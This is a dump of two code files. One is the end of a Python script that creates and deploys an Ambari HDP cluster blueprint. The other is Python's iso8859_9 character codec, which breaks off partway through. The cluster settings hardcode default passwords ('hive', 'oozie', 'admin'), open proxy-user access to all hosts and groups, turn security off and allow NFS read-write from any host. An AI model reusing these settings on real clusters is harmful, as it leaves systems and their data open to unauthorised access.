"user_group": "hadoop",
"security_enabled": "false"
}
},
{
"core-site" : {
"hadoop.proxyuser.hue.hosts" : "*",
"hadoop.proxyuser.hue.groups" : "*",
"hadoop.proxyuser.root.hosts" : "*",
"hadoop.proxyuser.root.groups" : "*",
"hadoop.proxyuser.oozie.hosts" : "*",
"hadoop.proxyuser.oozie.groups" : "*",
"hadoop.proxyuser.hcat.hosts" : "*",
"hadoop.proxyuser.hcat.groups" : "*"
}
},
{
"hadoop-env": {
"dtnode_heapsize" : "250",
"hadoop_heapsize" : "250",
"namenode_heapsize" : "250",
"namenode_opt_newsize": "50",
"namenode_opt_maxnewsize": "100"
}
},
{
"hbase-site" : {
"hbase.security.authorization": "true",
"hbase.rpc.engine": "org.apache.hadoop.hbase.ipc.SecureRpcEngine",
"hbase_master_heapsize": "250",
"hbase_regionserver_heapsize": "250",
"hbase.rpc.protection": "PRIVACY"
}
},
{
"hdfs-site" : {
"dfs.block.size" : "34217472",
"dfs.replication" : "1",
"dfs.namenode.accesstime.precision" : "3600000",
"dfs.nfs3.dump.dir" : "/tmp/.hdfs-nfs",
"dfs.nfs.exports.allowed.hosts" : "* rw",
"dfs.datanode.max.xcievers" : "1024",
"dfs.block.access.token.enable" : "false",
"dfs.datanode.data.dir": "/disks/0/hadoop/hdfs/data,/disks/1/hadoop/hdfs/data,/disks/2/hadoop/hdfs/data,/disks/3/hadoop/hdfs/data,/disks/4/hadoop/hdfs/data,/disks/5/hadoop/hdfs/data,/disks/6/hadoop/hdfs/data,/disks/7/hadoop/hdfs/data,/disks/8/hadoop/hdfs/data,/disks/9/hadoop/hdfs/data,/disks/10/hadoop/hdfs/data,/disks/11/hadoop/hdfs/data,/disks/12/hadoop/hdfs/data,/disks/13/hadoop/hdfs/data,/disks/14/hadoop/hdfs/data,/disks/15/hadoop/hdfs/data",
"dfs.namenode.checkpoint.dir": "/disks/0/hadoop/hdfs/namesecondary",
"dfs.namenode.name.dir": "/disks/0/hadoop/hdfs/namenode,/disks/1/hadoop/hdfs/namenode,/disks/2/hadoop/hdfs/namenode,/disks/3/hadoop/hdfs/namenode,/disks/4/hadoop/hdfs/namenode,/disks/5/hadoop/hdfs/namenode,/disks/6/hadoop/hdfs/namenode,/disks/7/hadoop/hdfs/namenode",
"dfs.datanode.failed.volumes.tolerated": "6"
}
},
{
"global": {
"oozie_data_dir": "/disks/0/hadoop/oozie/data",
"zk_data_dir": "/disks/0/hadoop/zookeeper",
"falcon.embeddedmq.data": "/disks/0/hadoop/falcon/embeddedmq/data",
"falcon_local_dir": "/disks/0/hadoop/falcon",
"namenode_heapsize" : "16384m"
}
},
{
"hive-site" : {
"javax.jdo.option.ConnectionPassword" : "hive",
"hive.tez.container.size" : "250",
"hive.tez.java.opts" : "-server -Xmx200m -Djava.net.preferIPv4Stack=true",
"hive.heapsize" : "250",
"hive.users.in.admin.role" : "hue,hive",
"hive_metastore_user_passwd" : "hive",
"hive.server2.enable.impersonation": "true",
"hive.compactor.check.interval": "300s",
"hive.compactor.initiator.on": "true",
"hive.compactor.worker.timeout": "86400s",
"hive.enforce.bucketing": "true",
"hive.support.concurrency": "true",
"hive.exec.dynamic.partition.mode": "nonstrict",
"hive.server2.enable.doAs": "true",
"hive.txn.manager": "org.apache.hadoop.hive.ql.lockmgr.DbTxnManager",
"hive.txn.max.open.batch": "1000",
"hive.txn.timeout": "300",
"hive.security.authorization.enabled": "false",
"hive.users.in.admin.role": "hue,hive",
"hive.metastore.uris" : "thrift://%HOSTGROUP::master_2%:9083"
}
},
{
"mapred-env": {
"jobhistory_heapsize" : "250"
}
},
{
"mapred-site" : {
"mapreduce.map.memory.mb" : "250",
"mapreduce.reduce.memory.mb" : "250",
"mapreduce.task.io.sort.mb" : "64",
"yarn.app.mapreduce.am.resource.mb" : "250",
"yarn.app.mapreduce.am.command-opts" : "-Xmx200m",
"mapred.job.reduce.memory.mb" : "250",
"mapred.child.java.opts" : "-Xmx200m",
"mapred.job.map.memory.mb" : "250",
"io.sort.mb" : "64",
"mapreduce.map.java.opts" : "-Xmx200m",
"mapreduce.reduce.java.opts" : "-Xmx200m"
}
},
{
"oozie-site" : {
"oozie.service.ProxyUserService.proxyuser.hue.hosts" : "*",
"oozie.service.ProxyUserService.proxyuser.hue.groups" : "*",
"oozie.service.ProxyUserService.proxyuser.falcon.hosts": "*",
"oozie.service.ProxyUserService.proxyuser.falcon.groups": "*",
"oozie.service.JPAService.jdbc.password" : "oozie"
}
},
{
"storm-site" : {
"logviewer.port" : 8005,
"nimbus.childopts" : "-Xmx220m -javaagent:/usr/hdp/current/storm-client/contrib/storm-jmxetric/lib/jmxetric-1.0.4.jar=host=sandbox.hortonworks.com,port=8649,wireformat31x=true,mode=multicast,config=/usr/hdp/current/storm-client/contrib/storm-jmxetric/conf/jmxetric-conf.xml,process=Nimbus_JVM",
"ui.childopts" : "-Xmx220m",
"drpc.childopts" : "-Xmx220m"
}
},
{
"tez-site" : {
"tez.am.java.opts" : "-server -Xmx200m -Djava.net.preferIPv4Stack=true -XX:+UseNUMA -XX:+UseParallelGC",
"tez.am.resource.memory.mb" : "250",
"tez.dag.am.resource.memory.mb" : "250",
"yarn.app.mapreduce.am.command-opts" : "-Xmx200m"
}
},
{
"webhcat-site" : {
"webhcat.proxyuser.hue.hosts" : "*",
"webhcat.proxyuser.hue.groups" : "*",
"webhcat.proxyuser.hcat.hosts" : "*",
"webhcat.proxyuser.hcat.groups" : "*",
"templeton.hive.properties" : "hive.metastore.local=false,hive.metastore.uris=thrift://sandbox.hortonworks.com:9083,hive.metastore.sasl.enabled=false,hive.metastore.execute.setugi=true,hive.metastore.warehouse.dir=/apps/hive/warehouse"
}
},
{
"yarn-env": {
"apptimelineserver_heapsize" : "250",
"resourcemanager_heapsize" : "250",
"nodemanager_heapsize" : "250",
"yarn_heapsize" : "250"
}
},
{
"yarn-site" : {
"yarn.nodemanager.resource.memory-mb": "2250",
"yarn.nodemanager.vmem-pmem-ratio" : "10",
"yarn.scheduler.minimum-allocation-mb" : "250",
"yarn.scheduler.maximum-allocation-mb" : "2250",
"yarn.nodemanager.pmem-check-enabled" : "false",
"yarn.acl.enable" : "false",
"yarn.resourcemanager.webapp.proxyuser.hcat.groups" : "*",
"yarn.resourcemanager.webapp.proxyuser.hcat.hosts" : "*",
"yarn.resourcemanager.webapp.proxyuser.oozie.groups" : "*",
"yarn.resourcemanager.webapp.proxyuser.oozie.hosts" : "*"
}
}
]
standard_configurations = [
{
"ams-hbase-env" : {
"properties" : {
"hbase_master_heapsize" : "512m",
"hbase_regionserver_heapsize" : "512m",
"hbase_regionserver_xmn_max" : "256m",
"hbase_regionserver_xmn_ratio" : "0.2"
}
}
},
{
"capacity-scheduler" : {
"yarn.scheduler.capacity.root.default.maximum-am-resource-percent" : "0.5",
"yarn.scheduler.capacity.maximum-am-resource-percent" : "0.5"
}
},
{
"cluster-env": {
"cluster_name": "hdp",
"smokeuser": "ambari-qa",
"user_group": "hadoop",
"security_enabled": "false"
}
},
{
"core-site" : {
"hadoop.proxyuser.hue.hosts" : "*",
"hadoop.proxyuser.hue.groups" : "*",
"hadoop.proxyuser.root.hosts" : "*",
"hadoop.proxyuser.root.groups" : "*",
"hadoop.proxyuser.oozie.hosts" : "*",
"hadoop.proxyuser.oozie.groups" : "*",
"hadoop.proxyuser.hcat.hosts" : "*",
"hadoop.proxyuser.hcat.groups" : "*"
}
},
{
"hadoop-env": {
"dtnode_heapsize" : "250",
"hadoop_heapsize" : "250",
"namenode_heapsize" : "250",
"namenode_opt_newsize": "50",
"namenode_opt_maxnewsize": "100"
}
},
{
"yarn-site": {
"yarn.nodemanager.local-dirs": "/disks/0/hadoop/yarn/local,/disks/1/hadoop/yarn/local,/disks/2/hadoop/yarn/local,/disks/3/hadoop/yarn/local,/disks/4/hadoop/yarn/local,/disks/5/hadoop/yarn/local,/disks/6/hadoop/yarn/local,/disks/7/hadoop/yarn/local",
"yarn.nodemanager.log-dirs": "/disks/0/hadoop/yarn/log,/disks/1/hadoop/yarn/log,/disks/2/hadoop/yarn/log,/disks/3/hadoop/yarn/log,/disks/4/hadoop/yarn/log,/disks/5/hadoop/yarn/log,/disks/6/hadoop/yarn/log,/disks/7/hadoop/yarn/log,/disks/8/hadoop/yarn/log,/disks/9/hadoop/yarn/log,/disks/10/hadoop/yarn/log,/disks/11/hadoop/yarn/log,/disks/12/hadoop/yarn/log,/disks/13/hadoop/yarn/log,/disks/14/hadoop/yarn/log,/disks/15/hadoop/yarn/log",
"yarn.timeline-service.leveldb-timeline-store.path": "/disks/0/hadoop/yarn/timeline",
"yarn.nodemanager.resource.memory-mb" : "32768",
"yarn.scheduler.maximum-allocation-mb" : "32768",
"yarn.scheduler.minimum-allocation-mb" : "2048"
}
},
{
"tez-site": {
"tez.am.resource.memory.mb" : "2048",
"tez.am.java.opts" : "-server -Xmx1638m -Djava.net.preferIPv4Stack=true -XX:+UseNUMA -XX:+UseParallelGC"
}
},
{
"mapred-site": {
"mapreduce.map.java.opts" : "-Xmx1638m",
"mapreduce.map.memory.mb" : "2048",
"mapreduce.reduce.java.opts" : "-Xmx1638m",
"mapreduce.reduce.memory.mb" : "2048",
"mapreduce.task.io.sort.mb" : "819",
"yarn.app.mapreduce.am.command-opts" : "-Xmx1638m",
"yarn.app.mapreduce.am.resource.mb" : "2048"
}
},
{
"hdfs-site": {
"dfs.datanode.data.dir": "/disks/0/hadoop/hdfs/data,/disks/1/hadoop/hdfs/data,/disks/2/hadoop/hdfs/data,/disks/3/hadoop/hdfs/data,/disks/4/hadoop/hdfs/data,/disks/5/hadoop/hdfs/data,/disks/6/hadoop/hdfs/data,/disks/7/hadoop/hdfs/data,/disks/8/hadoop/hdfs/data,/disks/9/hadoop/hdfs/data,/disks/10/hadoop/hdfs/data,/disks/11/hadoop/hdfs/data,/disks/12/hadoop/hdfs/data,/disks/13/hadoop/hdfs/data,/disks/14/hadoop/hdfs/data,/disks/15/hadoop/hdfs/data",
"dfs.namenode.checkpoint.dir": "/disks/0/hadoop/hdfs/namesecondary",
"dfs.namenode.name.dir": "/disks/0/hadoop/hdfs/namenode,/disks/1/hadoop/hdfs/namenode,/disks/2/hadoop/hdfs/namenode,/disks/3/hadoop/hdfs/namenode,/disks/4/hadoop/hdfs/namenode,/disks/5/hadoop/hdfs/namenode,/disks/6/hadoop/hdfs/namenode,/disks/7/hadoop/hdfs/namenode",
"dfs.datanode.failed.volumes.tolerated": "6",
"dfs.nfs3.dump.dir" : "/tmp/.hdfs-nfs"
}
},
{
"global": {
"oozie_data_dir": "/disks/0/hadoop/oozie/data",
"zk_data_dir": "/disks/0/hadoop/zookeeper",
"falcon.embeddedmq.data": "/disks/0/hadoop/falcon/embeddedmq/data",
"falcon_local_dir": "/disks/0/hadoop/falcon",
"namenode_heapsize" : "16384m"
}
},
{
"hbase-site" : {
"hbase.security.authorization": "true",
"hbase.rpc.engine": "org.apache.hadoop.hbase.ipc.SecureRpcEngine",
"hbase_master_heapsize": "250",
"hbase_regionserver_heapsize": "250",
"hbase.rpc.protection": "PRIVACY",
"hbase.tmp.dir": "/disks/0/hadoop/hbase"
}
},
{
"storm-site": {
"storm.local.dir": "/disks/0/hadoop/storm"
}
},
{
"falcon-startup.properties": {
"*.config.store.uri": "file:///disks/0/hadoop/falcon/store"
}
},
{
"hive-site": {
"hive.auto.convert.join.noconditionaltask.size" : "716177408",
"hive.tez.container.size" : "2048",
"hive.tez.java.opts" : "-server -Xmx1638m -Djava.net.preferIPv4Stack=true -XX:NewRatio=8 -XX:+UseNUMA -XX:+UseParallelGC",
"hive.metastore.uris" : "thrift://%HOSTGROUP::master_3%:9083"
}
}
]
configurations = evaluation_configurations if scenario_id == 'evaluation' else standard_configurations
data = {
"configurations" : configurations,
"host_groups": host_groups,
"Blueprints" : {
"blueprint_name" : blueprint_name,
"stack_name" : "HDP",
"stack_version" : "2.2"
}
}
data = json.dumps(data)
request = urllib2.Request(url, data)
request.add_header('Authorization', get_ambari_auth_string())
request.add_header('X-Requested-By', 'ambari')
request.add_header('Content-Type', 'text/plain')
try:
response = urllib2.urlopen(request, timeout=request_timeout)
pprint.pprint(response.read())
except urllib2.HTTPError as e:
logger.error('Blueprint creation failed: ' + e.read())
raise e
return blueprint_name
def initiate_cluster_deploy(blueprint_name, cluster_id, num_masters, num_workers):
logger.info('Deploying cluster...')
url = '%s://localhost:%s/api/v1/clusters/%s' % (protocol, port, cluster_id)
if num_masters + num_workers < 4:
raise Exception('Cluster size must be 4 or greater')
data = {
"blueprint": blueprint_name,
"default_password": "admin",
"host_groups": [
]
}
for i in range(1, num_masters + 1):
data['host_groups'].append({
"name": "master_%d" % i,
"hosts": [{
"fqdn": get_fqdn(i)
}]
})
worker_hosts = []
for i in range(num_masters + 1, num_masters + num_workers + 1):
worker_hosts.append({
"fqdn": get_fqdn(i)
})
data['host_groups'].append({
"name": "workers",
"hosts": worker_hosts
})
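# Illustrative payload produced above for num_masters=2, num_workers=3 (the FQDNs
# are hypothetical and depend on --master_prefix/--worker_prefix/--domain_name):
# {
#   "blueprint": "myblueprint",
#   "default_password": "admin",
#   "host_groups": [
#     {"name": "master_1", "hosts": [{"fqdn": "demo-master-01.cloudapp.net"}]},
#     {"name": "master_2", "hosts": [{"fqdn": "demo-master-02.cloudapp.net"}]},
#     {"name": "workers", "hosts": [{"fqdn": "demo-worker-01.cloudapp.net"},
#                                   {"fqdn": "demo-worker-02.cloudapp.net"},
#                                   {"fqdn": "demo-worker-03.cloudapp.net"}]}
#   ]
# }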
data = json.dumps(data)
pprint.pprint('data=' + data)
request = urllib2.Request(url, data)
request.add_header('Authorization', get_ambari_auth_string())
request.add_header('X-Requested-By', 'ambari')
request.add_header('Content-Type', 'text/plain')
try:
response = urllib2.urlopen(request, timeout=120)
pprint.pprint(response.read())
except urllib2.HTTPError as e:
logger.error('Cluster deployment failed: ' + e.read())
raise e
def poll_until_cluster_deployed(cluster_id, timeout):
url = '%s://localhost:%s/api/v1/clusters/%s/requests/1?fields=Requests/progress_percent,Requests/request_status' % (protocol, port, cluster_id)
deploy_success = False
deploy_finished = False
start_time = time.time()
logger.info('Polling until cluster deployment has finished...')
while time.time() - start_time < timeout:
request = urllib2.Request(url)
request.add_header("Authorization", get_ambari_auth_string())
try:
result = urllib2.urlopen(request, timeout=request_timeout).read()
pprint.pprint(result)
if (result is not None):
jsonResult = json.loads(result)
if jsonResult['Requests']['request_status'] == 'COMPLETED':
deploy_success = True
if int(jsonResult['Requests']['progress_percent']) == 100 or jsonResult['Requests']['request_status'] == 'FAILED':
deploy_finished = True
break
except:
logger.info('Could not poll deploy status from the server.')
time.sleep(5)
if not deploy_finished:
raise TimeoutException('Timed out while waiting for cluster deployment to finish')
elif not deploy_success:
raise Exception('Cluster deploy failed')
if action == 'bootstrap':
masters_iplist = masters_iplist.split(',')
workers_iplist = workers_iplist.split(',')
ambari_server_hostname = get_hostname(1)
all_hostnames = map((lambda i: get_hostname(i)), range(1, num_masters + num_workers + 1))
logger.info(all_hostnames)
host_ip_map = get_host_ip_map(all_hostnames)
update_etc_hosts(host_ip_map)
update_ambari_agent_ini(ambari_server_hostname)
patch_ambari_agent()
run_system_command('chkconfig ambari-agent on')
logger.info('Starting ambari-agent...')
run_system_command('ambari-agent start')
logger.info('ambari-agent started')
if is_ambari_server_host():
run_system_command('chkconfig ambari-server on')
logger.info('Running ambari-server setup...')
run_system_command('ambari-server setup -s -j /usr/jdk64/jdk1.7.0_45')
logger.info('ambari-server setup finished')
if protocol == 'https':
logger.info('Enabling HTTPS...')
enable_https()
logger.info('HTTPS enabled')
logger.info('Starting ambari-server...')
run_system_command('ambari-server start')
logger.info('ambari-server started')
try:
set_admin_password(admin_password, 60 * 2)
# set current_admin_password so that HTTP requests to Ambari start using the new user-specified password
current_admin_password = admin_password
poll_until_all_agents_registered(num_masters + num_workers, 60 * 4)
blueprint_name = create_blueprint(scenario_id)
initiate_cluster_deploy(blueprint_name, cluster_id, num_masters, num_workers)
except:
logger.error('Failed VM Bootstrap')
sys.exit(1)
else:
try:
current_admin_password = admin_password
poll_until_cluster_deployed(cluster_id, check_timeout_seconds)
except TimeoutException as e:
logger.info(e)
if report_timeout_fail:
logger.error('Failed cluster deployment')
sys.exit(1)
else:
logger.info('Cluster deployment has not completed')
sys.exit(0)
except:
logger.error('Failed cluster deployment')
sys.exit(1)
logger.info('Finished VM Bootstrap successfully')
sys.exit(0)
| mit |
dpiers/coderang-meteor | public/jsrepl/extern/python/unclosured/lib/python2.7/encodings/iso8859_9.py | 593 | 13412 | """ Python Character Mapping Codec iso8859_9 generated from 'MAPPINGS/ISO8859/8859-9.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='iso8859-9',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
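### Usage sketch
# The codec is looked up by name through Python's standard codec machinery, e.g.
# (byte values verified against the decoding table below):
#   u'\u011f\u0131\u015f'.encode('iso8859-9')  -> '\xf0\xfd\xfe'
#   '\xf0\xfd\xfe'.decode('iso8859-9')         -> u'\u011f\u0131\u015f'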
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> NULL
u'\x01' # 0x01 -> START OF HEADING
u'\x02' # 0x02 -> START OF TEXT
u'\x03' # 0x03 -> END OF TEXT
u'\x04' # 0x04 -> END OF TRANSMISSION
u'\x05' # 0x05 -> ENQUIRY
u'\x06' # 0x06 -> ACKNOWLEDGE
u'\x07' # 0x07 -> BELL
u'\x08' # 0x08 -> BACKSPACE
u'\t' # 0x09 -> HORIZONTAL TABULATION
u'\n' # 0x0A -> LINE FEED
u'\x0b' # 0x0B -> VERTICAL TABULATION
u'\x0c' # 0x0C -> FORM FEED
u'\r' # 0x0D -> CARRIAGE RETURN
u'\x0e' # 0x0E -> SHIFT OUT
u'\x0f' # 0x0F -> SHIFT IN
u'\x10' # 0x10 -> DATA LINK ESCAPE
u'\x11' # 0x11 -> DEVICE CONTROL ONE
u'\x12' # 0x12 -> DEVICE CONTROL TWO
u'\x13' # 0x13 -> DEVICE CONTROL THREE
u'\x14' # 0x14 -> DEVICE CONTROL FOUR
u'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x16 -> SYNCHRONOUS IDLE
u'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x18 -> CANCEL
u'\x19' # 0x19 -> END OF MEDIUM
u'\x1a' # 0x1A -> SUBSTITUTE
u'\x1b' # 0x1B -> ESCAPE
u'\x1c' # 0x1C -> FILE SEPARATOR
u'\x1d' # 0x1D -> GROUP SEPARATOR
u'\x1e' # 0x1E -> RECORD SEPARATOR
u'\x1f' # 0x1F -> UNIT SEPARATOR
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> DELETE
u'\x80' # 0x80 -> <control>
u'\x81' # 0x81 -> <control>
u'\x82' # 0x82 -> <control>
u'\x83' # 0x83 -> <control>
u'\x84' # 0x84 -> <control>
u'\x85' # 0x85 -> <control>
u'\x86' # 0x86 -> <control>
u'\x87' # 0x87 -> <control>
u'\x88' # 0x88 -> <control>
u'\x89' # 0x89 -> <control>
u'\x8a' # 0x8A -> <control>
u'\x8b' # 0x8B -> <control>
u'\x8c' # 0x8C -> <control>
u'\x8d' # 0x8D -> <control>
u'\x8e' # 0x8E -> <control>
u'\x8f' # 0x8F -> <control>
u'\x90' # 0x90 -> <control>
u'\x91' # 0x91 -> <control>
u'\x92' # 0x92 -> <control>
u'\x93' # 0x93 -> <control>
u'\x94' # 0x94 -> <control>
u'\x95' # 0x95 -> <control>
u'\x96' # 0x96 -> <control>
u'\x97' # 0x97 -> <control>
u'\x98' # 0x98 -> <control>
u'\x99' # 0x99 -> <control>
u'\x9a' # 0x9A -> <control>
u'\x9b' # 0x9B -> <control>
u'\x9c' # 0x9C -> <control>
u'\x9d' # 0x9D -> <control>
u'\x9e' # 0x9E -> <control>
u'\x9f' # 0x9F -> <control>
u'\xa0' # 0xA0 -> NO-BREAK SPACE
u'\xa1' # 0xA1 -> INVERTED EXCLAMATION MARK
u'\xa2' # 0xA2 -> CENT SIGN
u'\xa3' # 0xA3 -> POUND SIGN
u'\xa4' # 0xA4 -> CURRENCY SIGN
u'\xa5' # 0xA5 -> YEN SIGN
u'\xa6' # 0xA6 -> BROKEN BAR
u'\xa7' # 0xA7 -> SECTION SIGN
u'\xa8' # 0xA8 -> DIAERESIS
u'\xa9' # 0xA9 -> COPYRIGHT SIGN
u'\xaa' # 0xAA -> FEMININE ORDINAL INDICATOR
u'\xab' # 0xAB -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xac' # 0xAC -> NOT SIGN
u'\xad' # 0xAD -> SOFT HYPHEN
u'\xae' # 0xAE -> REGISTERED SIGN
u'\xaf' # 0xAF -> MACRON
u'\xb0' # 0xB0 -> DEGREE SIGN
u'\xb1' # 0xB1 -> PLUS-MINUS SIGN
u'\xb2' # 0xB2 -> SUPERSCRIPT TWO
u'\xb3' # 0xB3 -> SUPERSCRIPT THREE
u'\xb4' # 0xB4 -> ACUTE ACCENT
u'\xb5' # 0xB5 -> MICRO SIGN
u'\xb6' # 0xB6 -> PILCROW SIGN
u'\xb7' # 0xB7 -> MIDDLE DOT
u'\xb8' # 0xB8 -> CEDILLA
u'\xb9' # 0xB9 -> SUPERSCRIPT ONE
u'\xba' # 0xBA -> MASCULINE ORDINAL INDICATOR
u'\xbb' # 0xBB -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbc' # 0xBC -> VULGAR FRACTION ONE QUARTER
u'\xbd' # 0xBD -> VULGAR FRACTION ONE HALF
u'\xbe' # 0xBE -> VULGAR FRACTION THREE QUARTERS
u'\xbf' # 0xBF -> INVERTED QUESTION MARK
u'\xc0' # 0xC0 -> LATIN CAPITAL LETTER A WITH GRAVE
u'\xc1' # 0xC1 -> LATIN CAPITAL LETTER A WITH ACUTE
u'\xc2' # 0xC2 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
u'\xc3' # 0xC3 -> LATIN CAPITAL LETTER A WITH TILDE
u'\xc4' # 0xC4 -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\xc5' # 0xC5 -> LATIN CAPITAL LETTER A WITH RING ABOVE
u'\xc6' # 0xC6 -> LATIN CAPITAL LETTER AE
u'\xc7' # 0xC7 -> LATIN CAPITAL LETTER C WITH CEDILLA
u'\xc8' # 0xC8 -> LATIN CAPITAL LETTER E WITH GRAVE
u'\xc9' # 0xC9 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\xca' # 0xCA -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
u'\xcb' # 0xCB -> LATIN CAPITAL LETTER E WITH DIAERESIS
u'\xcc' # 0xCC -> LATIN CAPITAL LETTER I WITH GRAVE
u'\xcd' # 0xCD -> LATIN CAPITAL LETTER I WITH ACUTE
u'\xce' # 0xCE -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
u'\xcf' # 0xCF -> LATIN CAPITAL LETTER I WITH DIAERESIS
u'\u011e' # 0xD0 -> LATIN CAPITAL LETTER G WITH BREVE
u'\xd1' # 0xD1 -> LATIN CAPITAL LETTER N WITH TILDE
u'\xd2' # 0xD2 -> LATIN CAPITAL LETTER O WITH GRAVE
u'\xd3' # 0xD3 -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xd4' # 0xD4 -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
u'\xd5' # 0xD5 -> LATIN CAPITAL LETTER O WITH TILDE
u'\xd6' # 0xD6 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xd7' # 0xD7 -> MULTIPLICATION SIGN
u'\xd8' # 0xD8 -> LATIN CAPITAL LETTER O WITH STROKE
u'\xd9' # 0xD9 -> LATIN CAPITAL LETTER U WITH GRAVE
u'\xda' # 0xDA -> LATIN CAPITAL LETTER U WITH ACUTE
u'\xdb' # 0xDB -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
u'\xdc' # 0xDC -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\u0130' # 0xDD -> LATIN CAPITAL LETTER I WITH DOT ABOVE
u'\u015e' # 0xDE -> LATIN CAPITAL LETTER S WITH CEDILLA
u'\xdf' # 0xDF -> LATIN SMALL LETTER SHARP S
